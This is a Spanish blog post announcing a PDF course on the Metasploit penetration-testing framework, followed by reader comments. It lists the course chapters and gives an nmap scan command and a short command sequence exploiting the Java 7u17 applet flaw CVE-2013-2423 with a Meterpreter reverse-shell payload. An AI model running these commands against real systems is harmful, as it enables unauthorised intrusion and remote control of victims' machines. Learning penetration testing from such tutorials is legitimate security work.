Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Foro de elhacker.net - Noticias

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon Curso de Metasploit Framework




Metasploit es un “Framework” para realizar test de intrusión desarrollado por Rapid 7. Existen 3 versiones de Metasploit, entre ellas la “Community Edition” sobre la que vamos a basar este módulo






Metasploit incorpora un “set” de herramientas (exploits, scanners, payloads, etc) que cubren perfectamente todas las fases de un test de intrusión (pentest), desde la adquisición de información y reconocimiento, hasta el descubrimiento de vulnerabilidades, su explotación y post explotación.

En este documento vamos a intentar mostrar el funcionamiento de esta herramienta mediante la realización de ejemplos prácticos. Para la realización de dichos ejemplos, se empleará una distribución Linux llamada “Kali Linux” o su predecesora “BackTrack 5r3”.

A día de hoy, Metasploit se considera la verdadera “navaja suiza del Pentester”.

Metasploit proporciona interfaces de línea de comandos, gráficas y web con más de 300 módulos de exploit a lo largo de una extensa variedad de programas, servicios y sistemas operativos.

Seguidamente podemos ir al directorio en el que se encuentra instalado Metasploit y ejecutar la consola basada en texto (msfconsole), la interfaz web (msfweb), o la interfaz gráfica (msfgui).

Metasploit consta de varias herramientas distintas:

  • msfconsole. Consola de Metasploit.
  • msfcli. Nos permite ejecutar módulos directamente sin entrar en la consola.
  • msfpayload. Para generar payloads.
  • msfencode. Permite codificar los payloads para quitar null bytes por ejemplo.
  • msfvenom. Combinación de msfpayload y msfencode en una sola herramienta.

  • Índice
  • Changelog. 
  • Introducción. 
  • Fases de un test de intrusión.
  • Comenzando a utilizar Metasploit.
  • Conectar Metasploit a una base de datos.
  • Exploits más utilizados en servidores.
  • Exploits “client side”.
  • Post-­-Explotación.
  • Modificación de exploits en Metasploit.
  • Bypass de antivirus con Metasploit
  • Automatización de tareas en Metasploit.
  • Referencias.




Ejecutando nmap desde  MSFconsole


#msf > db_nmap -sS -A 192.168.0.2
#msf > db_services
Ortros scanners de puertos:

#msf > search portscan

 

 Ejemplo CVE-2013-2423 Java 7u17 Applet RCE Metasploit Demo


use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo


6 comentarios:

Fernando dijo...

Gracias por el aporte. Una question, además de los pdf´s ¿es este el comienzo de un curso de metasploit? porque si es así sería great.

el-brujo dijo...

No, lo siento. El curso son los ficheros pdf's. :P

Fernando dijo...

Ok, gracias. De todos modos si alguien sabe de una buena serie de tutoriales para aprender a manejarse con metasploit le quedaria agradecido si me pasara los links.
Un saludo.

JaNsI Requejo dijo...

es un buen aporte, gracias por tomarte el tiempo y compartirlo. muchas gracias otra vez.

Formación Online dijo...

Muy bueno, lo incluiré en mi portal.

Un saludo :D

Kira Yagami dijo...

Muchas gracias por el aporte, apenas comienzo a usar Kali Linux =D

Publicar un comentario en la entrada

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.